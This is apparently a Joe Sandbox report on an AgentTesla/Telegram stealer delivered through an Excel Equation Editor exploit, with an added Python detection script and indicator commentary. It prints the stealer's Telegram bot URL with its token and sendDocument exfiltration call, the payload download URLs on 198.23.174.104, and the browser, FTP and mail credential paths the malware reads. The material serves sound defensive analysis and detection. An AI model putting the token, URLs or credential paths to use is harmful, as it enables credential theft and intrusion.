                  Source: Yara match | File source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
                  Source: Yara match | File source: 4.2.vbc.exe.3446ec0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.vbc.exe.3446ec0.3.raw.unpack, type: UNPACKEDPE
                  Yara detected Telegram RAT
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Tries to steal Mail credentials (via file access)
                  Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara match | File source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

                  Remote Access Functionality:

                  Yara detected AgentTesla
                  Source: Yara match | File source: 00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2672, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
                  Source: Yara match | File source: 4.2.vbc.exe.3446ec0.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.vbc.exe.3446ec0.3.raw.unpack, type: UNPACKEDPE
                  Yara detected Telegram RAT
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Extra Window Memory Injection 1 | Disable or Modify Tools 1 | OS Credential Dumping 2 | File and Directory Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Web Service 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Process Injection 112 | Obfuscated Files or Information 31 | Credentials in Registry 1 | System Information Discovery 114 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 2 | Security Account Manager | Security Software Discovery 311 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Encrypted Channel 12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Extra Window Memory Injection 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | Carrier Billing Fraud |
                  Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 111 | LSA Secrets | Virtualization/Sandbox Evasion 131 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 23 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 131 | Cached Domain Credentials | Application Window Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

                  Behavior Graph

Behavior Graph ID: 383941
Sample: New Order for April#89032.xlsx
Start date: 08/04/2021
Architecture: WINDOWS
Score: 100

Root-level signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 12 other signatures.

Process tree reconstructed from the graph (node counters such as "38 34" are the graph's created-registry-value and created-file counts):

EXCEL.EXE (counters 38 34)
  drops C:\Users\...\~$New Order for April#89032.xlsx (data)

EQNEDT32.EXE (counter 12; shown as a separate root-level process, not as a child of EXCEL.EXE)
  connects to 198.23.174.104:80 from source port 49167 (AS-COLOCROSSINGUS, United States)
  drops C:\Users\user\AppData\Local\...\hkn[1].exe (PE32)
  drops C:\Users\Public\vbc.exe (PE32)
  signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  starts vbc.exe
    signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; 2 other signatures
    starts vbc.exe (second instance, counters 12 2)
      connects to api.telegram.org (149.154.167.220:443) from source port 49168 (TELEGRAMRU, United Kingdom)
      signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
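The chain above is what the report's Sigma hits ("EQNEDT32.EXE connecting to internet", "File Dropped By EQNEDT32EXE") and the "Office equation editor starts processes" signature key on, and it is easy to reproduce from endpoint telemetry. The script below is an added example, not part of the Joe Sandbox report: it runs a handful of process-tree heuristics over a constructed list of Sysmon-like events (EventID 1 process create, 3 network connect, 11 file create) that mirror the graph. The event field names, PIDs and the iexplore.exe noise record are assumptions made for the example. Note that Equation Editor is not a child of EXCEL.EXE in the graph, so the rules key on EQNEDT32.EXE itself rather than on an Office parent, and the Telegram rule only fires for images outside Program Files and Windows, because api.telegram.org is legitimate infrastructure (the report itself rates it "high" reputation).

```python
"""Process-tree heuristics for the EQNEDT32.EXE -> dropper -> stealer chain.

Added example; not part of the Joe Sandbox report. EVENTS is a constructed
list of Sysmon-like records (EventID 1 = process create, 3 = network connect,
11 = file create) mirroring the behaviour graph. Field names and PIDs are
assumptions chosen for this example, not a real Sysmon schema.
"""
import ntpath
from collections import Counter

EQNEDT = "eqnedt32.exe"
PUBLIC_DIR = "c:\\users\\public\\"                  # "user root directory" in the report
TRUSTED_PREFIXES = ("c:\\program files", "c:\\windows")

EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"
HKN = (r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
       r"\Content.IE5\ZAE7RW1P\hkn[1].exe")
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"

# Constructed telemetry (assumed field names), same order as the report's graph.
EVENTS = [
    {"id": 1, "pid": 1200, "ppid": 900, "image": EXCEL},
    # Equation Editor runs as its own COM server process; its parent is not EXCEL.EXE,
    # so none of the rules below rely on an Office parent.
    {"id": 1, "pid": 1300, "ppid": 600, "image": EQN},
    {"id": 3, "pid": 1300, "image": EQN, "dst_ip": "198.23.174.104", "dst_port": 80, "dst_host": ""},
    {"id": 11, "pid": 1300, "image": EQN, "target": HKN},
    {"id": 11, "pid": 1300, "image": EQN, "target": VBC},
    {"id": 1, "pid": 1400, "ppid": 1300, "image": VBC},
    {"id": 1, "pid": 1500, "ppid": 1400, "image": VBC},
    {"id": 3, "pid": 1500, "image": VBC, "dst_ip": "149.154.167.220", "dst_port": 443,
     "dst_host": "api.telegram.org"},
    # Benign noise: a browser talking to Telegram must not trip the C2 heuristic.
    {"id": 3, "pid": 2000, "image": IE, "dst_ip": "149.154.167.220", "dst_port": 443,
     "dst_host": "api.telegram.org"},
]


def _name(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def detect(events):
    """Return (rule, detail) findings. Rule names paraphrase the report's signatures."""
    images = {e["pid"]: e["image"] for e in events if e["id"] == 1}   # pid -> image
    findings = []
    for e in events:
        image, name = e["image"], _name(e["image"])
        low = image.lower()
        if e["id"] == 1:
            # "Office equation editor starts processes"
            if _name(images.get(e["ppid"], "")) == EQNEDT:
                findings.append(("eqnedt_child", f"pid {e['pid']} {name} started by EQNEDT32.EXE"))
            # "Drops PE files to the user root directory" followed by execution
            if low.startswith(PUBLIC_DIR):
                findings.append(("exec_from_public", f"pid {e['pid']} runs {image}"))
        elif e["id"] == 3:
            # Sigma: "EQNEDT32.EXE connecting to internet"
            if name == EQNEDT:
                findings.append(("eqnedt_net", f"EQNEDT32.EXE -> {e['dst_ip']}:{e['dst_port']}"))
            # "Uses the Telegram API" from a binary outside trusted install paths
            if e.get("dst_host") == "api.telegram.org" and not low.startswith(TRUSTED_PREFIXES):
                findings.append(("telegram_c2", f"{image} -> api.telegram.org"))
        elif e["id"] == 11:
            # Sigma: "File Dropped By EQNEDT32EXE" (PE written by the equation editor)
            if name == EQNEDT and e["target"].lower().endswith(".exe"):
                findings.append(("eqnedt_drop", f"EQNEDT32.EXE wrote {e['target']}"))
    return findings


def summarize(events):
    """Hit count per rule, handy for a quick verdict on a host."""
    return Counter(rule for rule, _ in detect(events))


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule:17} {detail}")
    print(dict(summarize(EVENTS)))
```

Any hit on the EQNEDT32.EXE rules is high-fidelity on a patched estate, since the equation editor has no business writing executables or opening sockets. The Telegram rule is a hunting lead rather than a blocker: a Telegram Desktop installed under a user profile would also match, and blocking 149.154.167.220 outright would break Telegram for everyone while the attacker simply rotates bots.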

                  Screenshots

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

Source | Detection | Scanner | Label
New Order for April#89032.xlsx | 31% | ReversingLabs | Document-Office.Exploit.MathType

Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe | 17% | ReversingLabs | Win32.Trojan.AgentTesla
C:\Users\Public\vbc.exe | 17% | ReversingLabs | Win32.Trojan.AgentTesla

Unpacked PE Files

Source | Detection | Scanner | Label
5.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1138205

                  Domains

                  No Antivirus matches

                  URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://api.telegram.orgP | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://WrqCET.com | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
https://YiNu10TJVGgbJcx5.com | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://198.23.174.104/hkn.exe | 100% | Avira URL Cloud | malware

The report lists one row per reputation lookup, so the same URL appeared up to four times; the duplicates are collapsed here. Trailing characters such as "0", "03", "0D", "P" and "PA" are most likely bytes adjacent to the string in memory (typical for URLs carved out of certificate blobs), not part of the URL, and "%s" / "%tordir%" mark format templates rather than literal addresses.

                  Domains and IPs

                  Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.telegram.org | 149.154.167.220 | true | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://198.23.174.104/hkn.exe | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp | false | | high
http://crl.entrust.net/server1.crl0 | vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://ocsp.entrust.net03 | vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://certificates.godaddy.com/repository/0 | vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp | false | | high
https://dist.nuget.org/win-x86-commandline/latest/nuget.exe | vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.dr | false | | high
https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocumentdocument----- | vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp | false | | high
https://github.com/d-haxton/HaxtonBot/archive/master.zip | vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.dr | false | | high
http://certs.godaddy.com/repository/1301 | vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp | false | | high
https://api.telegram.orgP | vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.godaddy.com/gdig2s1-1823.crl0 | vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp | false | | high
https://certs.godaddy.com/repository/0 | vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp | false | | high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css | vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp | false | | high
http://crl.godaddy.com/gdroot-g2.crl0F | vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp | false | | high
https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/ | vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp | false | | high
http://WrqCET.com | vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmp | false | | high
http://crl.godaddy.com/gdroot.crl0F | vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp | false | | high
http://www.%s.comPA | vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmp | false | URL Reputation: safe | low
https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip | vbc.exe, vbc.exe.2.dr | false | | high
https://YiNu10TJVGgbJcx5.com | vbc.exe, 00000005.00000002.2380811356.00000000025A4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://api.telegram.org | vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp | false | | high
http://certificates.godaddy.com/repository/gdig2.crt0 | vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp | false | | high
http://ocsp.entrust.net0D | vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | vbc.exe, 00000004.00000002.2167842702.00000000023A1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp | false | | high
https://secure.comodo.com/CPS0 | vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp | false | | high
https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument | vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380230451.0000000000583000.00000004.00000020.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.entrust.net/2048ca.crl0 | vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp | false | | high

The "Malicious: false / Reputation: high" verdict on the api.telegram.org/bot1620445910:... rows reflects the domain, not the use: the report's own "Uses the Telegram API (likely for C&C communication)" signature and the sendDocument method (Telegram's file-upload call) identify this bot URL as the exfiltration channel, so it is the actionable indicator in this table. The remaining entries are CRL/OCSP addresses from embedded certificates, .NET framework URIs and strings from the open-source projects the stealer's code was lifted from.

                                                              Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
198.23.174.104 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

                                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383941
Start date: 08.04.2021
Start time: 12:49:04
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 6s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: New Order for April#89032.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLSX@6/18@1/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 2.2% (good quality ratio 1.4%)
• Quality average: 40.5%
• Quality standard deviation: 31.2%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• TCP Packets have been reduced to 100
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

Time | Type | Description
12:50:13 | API Interceptor | 54x Sleep call for process: EQNEDT32.EXE modified
12:50:15 | API Interceptor | 793x Sleep call for process: vbc.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

Match | Associated Sample Name / URL | Detection | Context
149.154.167.220 | ORDER.exe | malicious |
149.154.167.220 | SecuriteInfo.com.Scr.Malcodegdn30.6111.exe | malicious |
149.154.167.220 | SecuriteInfo.com.Trojan.PackedNET.624.13772.exe | malicious |
149.154.167.220 | MUYR09080.exe | malicious |
149.154.167.220 | Revised Proforma.xlsx | malicious |
149.154.167.220 | Bellinger ordre.exe | malicious |
149.154.167.220 | QUATATION.exe | malicious |
149.154.167.220 | Purchase Order.exe | malicious |
149.154.167.220 | PO#.exe | malicious |
149.154.167.220 | OUR PO NO. CWI19150.exe | malicious |
149.154.167.220 | ORDER.exe | malicious |
149.154.167.220 | QUATATION.exe | malicious |
149.154.167.220 | 28B2i9LyU8.exe | malicious |
149.154.167.220 | (PO #MT098233).exe | malicious |
149.154.167.220 | Pg788amGxu.exe | malicious |
149.154.167.220 | 8oZswc8UuT.exe | malicious |
149.154.167.220 | Khay11iwV6.exe | malicious |
149.154.167.220 | vcoWaFYhyC.exe | malicious |
149.154.167.220 | Payment Proof.xlsx | malicious |
149.154.167.220 | QUATATION.exe | malicious |
198.23.174.104 | Payment Proof.xlsx | malicious | 198.23.174.104/uxx/kuk.exe
198.23.174.104 | uIIHdM0MHt.rtf | malicious | 198.23.174.104/om.exe
198.23.174.104 | SWIFT_ADVISED 1802.xlsx | malicious | 198.23.174.104/bbbb/vmv.exe
198.23.174.104 | Purchase Order No 4462758.xlsx | malicious | 198.23.174.104/eemm/xax.exe
198.23.174.104 | Medical Equipment supply Tender.xlsx | malicious | 198.23.174.104/nonon/oko.exe
198.23.174.104 | SWIFT_ADVISED 1802.xlsx | malicious | 198.23.174.104/jmmj/ddd.exe
198.23.174.104 | NewOrder-PO#08337.xlsx | malicious | 198.23.174.104/benn/mym.exe
198.23.174.104 | New Order-PO08337.xlsx | malicious | 198.23.174.104/benn/mym.exe
198.23.174.104 | Order08388393.xlsx | malicious | 198.23.174.104/away/mmn.exe
198.23.174.104 | 20210314$000469.xlsx | malicious | 198.23.174.104/laaal/lll.exe
198.23.174.104 | Drugs.xlsx | malicious | 198.23.174.104/wmmw/ooo.exe
198.23.174.104 | P O 65483939.xlsx | malicious | 198.23.174.104/avav/hrh.exe
198.23.174.104 | copia de pago_9485.xlsx | malicious | 198.23.174.104/ike/cox.exe
198.23.174.104 | Purchase Order Local_00000000089444.xlsx | malicious | 198.23.174.104/level/eve.exe
198.23.174.104 | P O 65483939.xlsx | malicious | 198.23.174.104/mori/ini.exe

The two IPs tell different stories. 149.154.167.220 is Telegram's API front end and turns up in every Telegram-exfiltrating sample, so it is not a useful blocklist entry on its own. 198.23.174.104 is a dedicated staging host: the same ColoCrossing address served a fresh payload under a new short path for each of the .xlsx and .rtf lures above, which makes the IP, not the path, the indicator to block and hunt for.

                                                                                                      Domains


ASN


JA3 Fingerprints


Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 881152
Entropy (8bit): 7.199964525474944
Encrypted: false
SSDEEP: 12288:cSIIK2eESbfOEauXDylVOhrecPoFe/OIDIUSyBlt+vEHTwzZIKU6ke:cNIVUXXulVSBPo8OIDlJbzyI/
MD5: 5F968F612F82F74C96DD257793CF917D
SHA1: 004213F3E85514317B8A711EDC42A124BE378ADF
SHA-256: 2A0C31DCC49402D53D3907CBD0C79473E20B64AA098ADF71437946E58BD55299
SHA-512: BAF41C5BC33A3349DFCF1B7A8978F002AB27A243A786BC80362132F757688AA366EE3A48A4CE071B39D9E9FDFAB04E5F204489D6BC23FEA7400CB5C9AABC2051
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 17%
Reputation: low
IE Cache URL: http://198.23.174.104/hkn.exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2BCDEC9D.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category: dropped
Size (bytes): 14198
Entropy (8bit): 7.916688725116637
Encrypted: false
SSDEEP: 384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5: E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1: 72CA86D260330FC32246D28349C07933E427065D
SHA-256: 7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512: A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33C3DEE4.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category: dropped
Size (bytes): 14198
Entropy (8bit): 7.916688725116637
Encrypted: false
SSDEEP: 384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5: E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1: 72CA86D260330FC32246D28349C07933E427065D
SHA-256: 7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512: A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\346FC870.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category: dropped
Size (bytes): 8815
Entropy (8bit): 7.944898651451431
Encrypted: false
SSDEEP: 192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5: F06432656347B7042C803FE58F4043E1
SHA1: 4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256: 409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512: 358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious: false
Reputation: moderate, very likely benign file
